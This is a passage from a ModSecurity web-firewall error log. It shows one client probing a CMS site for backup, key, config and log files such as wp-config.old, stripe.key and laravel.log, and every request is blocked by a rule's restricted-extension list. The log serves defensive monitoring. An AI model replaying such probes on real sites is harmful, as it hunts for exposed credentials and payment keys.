"PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/wp-config.old"] [unique_id "aa0Pb13UyizU6P-l0YK4PwAAAFA"] [Sun Mar 08 07:55:59.929988 2026] [:error] [pid 13472:tid 13523] [client 185.177.72.60:53574] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "aa0Pb13UyizU6P-l0YK4SQAAAE8"] [Sun Mar 08 07:56:01.166983 2026] [:error] [pid 13473:tid 13526] [client 185.177.72.60:47562] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.old"] [unique_id "aa0PcUwwZGElJGd8aN_WJQAAAIY"] [Sun Mar 08 07:56:01.918650 2026] [:error] [pid 13472:tid 13509] [client 185.177.72.60:47614] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "aa0PcV3UyizU6P-l0YK4cgAAAEY"] [Sun Mar 08 07:56:02.095086 2026] [:error] [pid 7010:tid 7039] [client 185.177.72.60:4560] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.key"] [unique_id "aa0Pcpq2Bzew8vjPgCGEvwAAAYI"] [Sun Mar 08 07:56:07.470997 2026] [:error] [pid 13605:tid 13623] [client 185.177.72.60:5946] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.log"] [unique_id "aa0PdzLobmDOvyRcAEi3hAAAANA"] [Sun Mar 08 07:56:08.074868 2026] [:error] [pid 13473:tid 13531] [client 185.177.72.60:6194] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.ini"] [unique_id "aa0PeEwwZGElJGd8aN_WRwAAAIk"] [Sun Mar 08 07:56:08.106460 2026] [:error] [pid 13473:tid 13553] [client 185.177.72.60:6212] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.bak"] [unique_id "aa0PeEwwZGElJGd8aN_WSAAAAJg"] [Sun Mar 08 07:56:08.181987 2026] [:error] [pid 13473:tid 13548] [client 185.177.72.60:6212] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.old"] [unique_id "aa0PeEwwZGElJGd8aN_WSQAAAJM"] [Sun Mar 08 07:56:08.299241 2026] [:error] [pid 13605:tid 13612] [client 185.177.72.60:5946] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.backup"] [unique_id "aa0PeDLobmDOvyRcAEi3iQAAAMU"] [Sun Mar 08 07:56:09.295177 2026] [:error] [pid 13472:tid 13530] [client 185.177.72.60:6162] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.conf"] [unique_id "aa0PeV3UyizU6P-l0YK4lgAAAFI"] [Sun Mar 08 07:56:09.427337 2026] [:error] [pid 11078:tid 11127] [client 185.177.72.60:6178] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.key"] [unique_id "aa0PeX-dmvIeGeY060nd2wAAAdE"] [Sun Mar 08 07:56:10.147474 2026] [:error] [pid 13605:tid 13611] [client 185.177.72.60:6400] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.log"] [unique_id "aa0PejLobmDOvyRcAEi3kQAAAMQ"] [Sun Mar 08 07:56:10.293167 2026] [:error] [pid 11078:tid 11131] [client 185.177.72.60:6178] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.conf"] [unique_id "aa0Pen-dmvIeGeY060nd4wAAAdU"] [Sun Mar 08 07:56:10.958750 2026] [:error] [pid 13605:tid 13630] [client 185.177.72.60:6400] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.ini"] [unique_id "aa0PejLobmDOvyRcAEi3lAAAANc"] [Sun Mar 08 07:56:11.150411 2026] [:error] [pid 11078:tid 11122] [client 185.177.72.60:6178] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.bak"] [unique_id "aa0Pe3-dmvIeGeY060nd6wAAAcw"] [Sun Mar 08 07:56:11.818283 2026] [:error] [pid 13605:tid 13608] [client 185.177.72.60:6400] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.old"] [unique_id "aa0PezLobmDOvyRcAEi3lgAAAME"] [Sun Mar 08 07:56:11.975600 2026] [:error] [pid 11078:tid 11118] [client 185.177.72.60:6178] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.backup"] [unique_id "aa0Pe3-dmvIeGeY060nd8QAAAcg"] [Sun Mar 08 07:56:19.541861 2026] [:error] [pid 13472:tid 13504] [client 185.177.72.60:10888] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/config.inc"] [unique_id "aa0Pg13UyizU6P-l0YK4sQAAAEI"] [Sun Mar 08 07:56:19.978610 2026] [:error] [pid 11078:tid 11125] [client 185.177.72.60:6578] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config.inc"] [unique_id "aa0Pg3-dmvIeGeY060neBwAAAc8"] [Sun Mar 08 07:56:21.927380 2026] [:error] [pid 13472:tid 13517] [client 185.177.72.60:10572] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aa0PhV3UyizU6P-l0YK4twAAAEw"] [Sun Mar 08 07:56:22.360407 2026] [:error] [pid 12699:tid 12715] [client 185.177.72.60:10932] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aa0PhhvluGPp5v4Lok_KUwAAAgE"] [Sun Mar 08 07:56:22.367048 2026] [:error] [pid 13605:tid 13611] [client 185.177.72.60:10636] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aa0PhjLobmDOvyRcAEi3qwAAAMQ"] [Sun Mar 08 07:56:22.500692 2026] [:error] [pid 11078:tid 11129] [client 185.177.72.60:10654] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL 